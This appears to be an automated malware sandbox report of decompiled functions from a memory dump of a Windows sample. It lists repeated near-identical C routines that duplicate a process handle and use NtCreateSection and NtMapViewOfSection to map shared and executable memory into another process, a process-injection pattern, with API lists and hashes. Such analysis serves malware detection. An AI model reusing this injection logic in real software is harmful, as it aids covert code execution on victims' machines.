								if(NtMapViewOfSection( *_t193,  *(_t208 - 0xc), _t125, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
									_t207 =  *(_t208 - 0x44);
									 *((intOrPtr*)(_t129 + 0x20))(_t180, _t207, 0x104);
									 *((intOrPtr*)(_t207 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
									 *(_t208 - 8) =  *(_t208 - 8) + 1;
								}
							}
						}
						_t101 = _t208 - 0x50;
						 *(_t101 + 4) = _t180;
						 *_t101 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
						_t194 = _t208 - 0x58;
						_t102 = NtCreateSection(_t194, 0xe, _t180, _t101, 0x40, 0x8000000, _t180);
						if (_t102 != 0) goto L66;
						 *_t102 =  *_t102 + _t102;
					}
				}
				_push(0x15a4);
				_t93 =  *_t211;
				_push(0x83);
				L004011F5(_t180, _t237);
				return _t93;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.448489482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rrjthgj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
Instruction ID: 3c61d4fa49215657d74707620d36eaa57d50516e3f831c539a14d6838cb40392
Opcode Fuzzy Hash: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
Instruction Fuzzy Hash: 23513CB1900249FBEB209F91CC49FAF7BB8EF85710F14412AF911BA1E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401577 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00401577() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t201;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				void* _t210;

				asm("repe push 0x387");
				_push(0x387);
				_t205 = _t204 + 4;
				_push(0x83);
				L004011F5(_t175, _t210);
				_t126 =  *((intOrPtr*)(_t202 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
				_t184 = _t202 - 0x60;
				 *_t184 = _t176;
				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t184);
				_t89 =  *_t184;
				if(_t89 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t202 - 8) = _t176;
						_t96 = _t202 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t120 = _t202 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t202 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L63;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t205;
				_push(0x83);
				L004011F5(_t176, _t231);
				return _t90;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.448489482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rrjthgj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
Instruction ID: ba3189e89dbc592d8eefb072767128172b6b3105eb2a85c49d1307986ab5c8dd
Opcode Fuzzy Hash: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
Instruction Fuzzy Hash: 9D511B71900249BFEB209F91CC48FAF7BB8FF85B14F10412AFA11BA1E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401523 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00401523(void* __eax, void* __esi, void* __eflags) {
				long _t89;
				long _t92;
				intOrPtr _t93;
				struct _GUID _t99;
				long _t100;
				struct _GUID _t101;
				long _t102;
				PVOID* _t123;
				long _t124;
				PVOID* _t125;
				long _t126;
				intOrPtr _t129;
				long* _t134;
				void* _t176;
				struct _EXCEPTION_RECORD _t177;
				struct _EXCEPTION_RECORD* _t187;
				intOrPtr* _t189;
				HANDLE* _t190;
				HANDLE* _t191;
				void* _t204;
				void* _t205;
				intOrPtr* _t207;

				asm("outsd");
				asm("out 0x70, al");
				if(__eflags > 0) {
					L004011F5(_t176, __eflags);
					_t129 =  *((intOrPtr*)(_t205 + 8));
					_t177 = 0;
					 *(_t205 - 0x34) = 0;
					__eflags = gs;
					if(gs != 0) {
						_t4 = _t205 - 0x34;
						 *_t4 =  *(_t205 - 0x34) + 1;
						__eflags =  *_t4;
					}
					while(1) {
						_t89 =  *((intOrPtr*)(_t129 + 0x48))();
						__eflags = _t89;
						if(_t89 != 0) {
							break;
						}
						 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
					}
					 *(_t205 - 0x5c) = _t89;
					_t187 = _t205 - 0x60;
					 *_t187 = _t177;
					 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t187);
					_t92 =  *_t187;
					__eflags = _t92;
					if(__eflags != 0) {
						_t134 = _t205 - 0x30;
						 *_t134 = _t92;
						_t134[1] = _t177;
						_t189 = _t205 - 0x28;
						 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
						 *_t189 = 0x18;
						__eflags =  *((intOrPtr*)(_t129 + 0x70))(_t205 - 0x10, 0x40, _t189, _t205 - 0x30);
						if(__eflags == 0) {
							__eflags = NtDuplicateObject( *(_t205 - 0x10), 0xffffffff, 0xffffffff, _t205 - 0xc, _t177, _t177, 2);
							if(__eflags == 0) {
								 *(_t205 - 8) = _t177;
								_t99 = _t205 - 0x50;
								 *(_t99 + 4) = _t177;
								 *_t99 = 0x5000;
								_t190 = _t205 - 0x54;
								_t100 = NtCreateSection(_t190, 6, _t177, _t99, 4, 0x8000000, _t177);
								__eflags = _t100;
								if(_t100 == 0) {
									 *_t26 =  *(_t205 - 0x50);
									_t123 = _t205 - 0x44;
									 *_t123 = _t177;
									_t124 = NtMapViewOfSection( *_t190, 0xffffffff, _t123, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
									__eflags = _t124;
									if(_t124 == 0) {
										_t125 = _t205 - 0x3c;
										 *_t125 = _t177;
										_t126 = NtMapViewOfSection( *_t190,  *(_t205 - 0xc), _t125, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
										__eflags = _t126;
										if(_t126 == 0) {
											_t204 =  *(_t205 - 0x44);
											 *((intOrPtr*)(_t129 + 0x20))(_t177, _t204, 0x104);
											 *((intOrPtr*)(_t204 + 0x208)) =  *((intOrPtr*)(_t205 + 0x14));
											_t38 = _t205 - 8;
											 *_t38 =  *(_t205 - 8) + 1;
											__eflags =  *_t38;
										}
									}
								}
								_t101 = _t205 - 0x50;
								 *(_t101 + 4) = _t177;
								 *_t101 =  *((intOrPtr*)(_t205 + 0x10)) + 0x10000;
								_t191 = _t205 - 0x58;
								_t102 = NtCreateSection(_t191, 0xe, _t177, _t101, 0x40, 0x8000000, _t177);
								__eflags = _t102;
								if (_t102 != 0) goto L60;
								 *_t102 =  *_t102 + _t102;
								__eflags =  *_t102;
							}
						}
					}
					_push(0x15a4);
					_t93 =  *_t207;
					_push(0x83);
					L004011F5(_t177, __eflags);
					return _t93;
				} else {
					asm("popfd");
					asm("repe add al, 0x9b");
					asm("wait");
					asm("wait");
					return __esi;
				}
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685

Memory Dump Source

Source File: 00000004.00000002.448489482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rrjthgj.jbxd

Similarity

API ID: Section$View$CreateDuplicateObject
String ID:
API String ID: 3617974760-0
Opcode ID: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
Instruction ID: c9dca56e4daa214b2bd9150ebf0f157daf6c833c296841cdcd3f7df5e4c146b1
Opcode Fuzzy Hash: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
Instruction Fuzzy Hash: 91510A71900249BFEB209F92CC48F9FBBB8FF85B14F14411AFA11BA2A5D7749945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040158C Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040158C(void* __eax, void* __edi) {
				void* _t89;
				intOrPtr _t91;
				struct _EXCEPTION_RECORD _t94;
				intOrPtr _t95;
				struct _GUID _t101;
				struct _GUID _t103;
				long _t104;
				PVOID* _t125;
				PVOID* _t127;
				intOrPtr _t131;
				struct _EXCEPTION_RECORD* _t136;
				void* _t180;
				struct _EXCEPTION_RECORD _t181;
				struct _EXCEPTION_RECORD* _t189;
				intOrPtr* _t191;
				HANDLE* _t192;
				HANDLE* _t193;
				void* _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				intOrPtr* _t211;
				intOrPtr _t216;

				_t211 = _t210 + 1;
				asm("clc");
				asm("stc");
				_t89 = _t207;
				_t208 = __eax;
				_t180 = __edi - 1;
				_t2 = _t89 - 0x7d;
				 *_t2 =  *((intOrPtr*)(_t89 - 0x7d));
				_t216 =  *_t2;
				_push(0x83);
				L004011F5(_t180, _t216);
				_t131 =  *((intOrPtr*)(__eax + 8));
				_t181 = 0;
				 *((intOrPtr*)(__eax - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(__eax - 0x34)) =  *((intOrPtr*)(__eax - 0x34)) + 1;
				}
				while(1) {
					_t91 =  *((intOrPtr*)(_t131 + 0x48))();
					if(_t91 != 0) {
						break;
					}
					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t208 - 0x5c)) = _t91;
				_t189 = _t208 - 0x60;
				 *_t189 = _t181;
				 *((intOrPtr*)(_t131 + 0x4c))(_t91, _t189);
				_t94 =  *_t189;
				if(_t94 != 0) {
					_t136 = _t208 - 0x30;
					 *_t136 = _t94;
					 *(_t136 + 4) = _t181;
					_t191 = _t208 - 0x28;
					 *((intOrPtr*)(_t131 + 0x10))(_t191, 0x18);
					 *_t191 = 0x18;
					_push(_t208 - 0x30);
					_push(_t191);
					_push(0x40);
					_push(_t208 - 0x10);
					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t181, _t181, 2) == 0) {
						 *(_t208 - 8) = _t181;
						_t101 = _t208 - 0x50;
						 *(_t101 + 4) = _t181;
						 *_t101 = 0x5000;
						_t192 = _t208 - 0x54;
						if(NtCreateSection(_t192, 6, _t181, _t101, 4, 0x8000000, _t181) == 0) {
							 *_t28 =  *(_t208 - 0x50);
							_t125 = _t208 - 0x44;
							 *_t125 = _t181;
							if(NtMapViewOfSection( *_t192, 0xffffffff, _t125, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
								_t127 = _t208 - 0x3c;
								 *_t127 = _t181;
								if(NtMapViewOfSection( *_t192,  *(_t208 - 0xc), _t127, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
									_t206 =  *(_t208 - 0x44);
									 *((intOrPtr*)(_t131 + 0x20))(_t181, _t206, 0x104);
									 *((intOrPtr*)(_t206 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
									 *(_t208 - 8) =  *(_t208 - 8) + 1;
								}
							}
						}
						_t103 = _t208 - 0x50;
						 *(_t103 + 4) = _t181;
						 *_t103 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
						_t193 = _t208 - 0x58;
						_t104 = NtCreateSection(_t193, 0xe, _t181, _t103, 0x40, 0x8000000, _t181);
						if (_t104 != 0) goto L60;
						 *_t104 =  *_t104 + _t104;
					}
				}
				_push(0x15a4);
				_t95 =  *_t211;
				_push(0x83);
				L004011F5(_t181, _t237);
				return _t95;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.448489482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rrjthgj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
Instruction ID: 02d2e3ac3767ea31e924919402f7a0ff100aaf9667a8aefd77e34752db93229b
Opcode Fuzzy Hash: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
Instruction Fuzzy Hash: C9513AB1900249BFEB209F92CC48F9FBBB8FF85B14F10415AFA11AA1E5D7749944CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00401585 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401585() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t185;
				intOrPtr* _t187;
				HANDLE* _t188;
				HANDLE* _t189;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				void* _t211;

				_push(0x387);
				_t206 = _t205 + 4;
				_push(0x83);
				L004011F5(_t175, _t211);
				_t126 =  *((intOrPtr*)(_t203 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t86;
				_t185 = _t203 - 0x60;
				 *_t185 = _t176;
				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t185);
				_t89 =  *_t185;
				if(_t89 != 0) {
					_t132 = _t203 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t187 = _t203 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t187, 0x18);
					 *_t187 = 0x18;
					_push(_t203 - 0x30);
					_push(_t187);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t203 - 8) = _t176;
						_t96 = _t203 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t188 = _t203 - 0x54;
						if(NtCreateSection(_t188, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t120 = _t203 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t120, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t203 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t122, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *(_t203 - 8) =  *(_t203 - 8) + 1;
								}
							}
						}
						_t98 = _t203 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						_t99 = NtCreateSection(_t189, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L64;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t206;
				_push(0x83);
				L004011F5(_t176, _t232);
				return _t90;
			}

0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.448489482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rrjthgj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
Instruction ID: 9d9f292dd7e40d4d2d6115b75542e29ae97a3c703512c5fffb38717ec82669a3
Opcode Fuzzy Hash: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
Instruction Fuzzy Hash: 36511A75900249BFEB209F91CC48FAF7BB8FF85B14F10416AFA11BA1A5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040159A Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0040159A() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t127;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t201;
				void* _t202;
				intOrPtr* _t204;
				void* _t209;

				_push(0x83);
				L004011F5(_t175, _t209);
				_t127 =  *((intOrPtr*)(_t202 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
				_t184 = _t202 - 0x60;
				 *_t184 = _t176;
				 *((intOrPtr*)(_t127 + 0x4c))(_t86, _t184);
				_t89 =  *_t184;
				if(_t89 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t202 - 8) = _t176;
						_t96 = _t202 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t120 = _t202 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t202 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L61;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t204;
				_push(0x83);
				L004011F5(_t176, _t230);
				return _t90;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.448489482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rrjthgj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
Instruction ID: 1cd82c906aaffff485458f801d6ba595cb0416390f7e33d4f9d681d8d529f326
Opcode Fuzzy Hash: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
Instruction Fuzzy Hash: BF510971900249BFEB209F92CC48F9FBBB8FF85B14F104159FA11AA2A5D6749940CB24

Uniqueness

Uniqueness Score: -1.00%

Function 01FE68FD Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 01FE6925
Module32First.KERNEL32(00000000,00000224), ref: 01FE6945

Memory Dump Source

Source File: 00000004.00000002.449916655.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1fe0000_rrjthgj.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: a2a6324c9429e0a531e9607c2bd0afdfa28ca648033202381bfb40dc39504db4
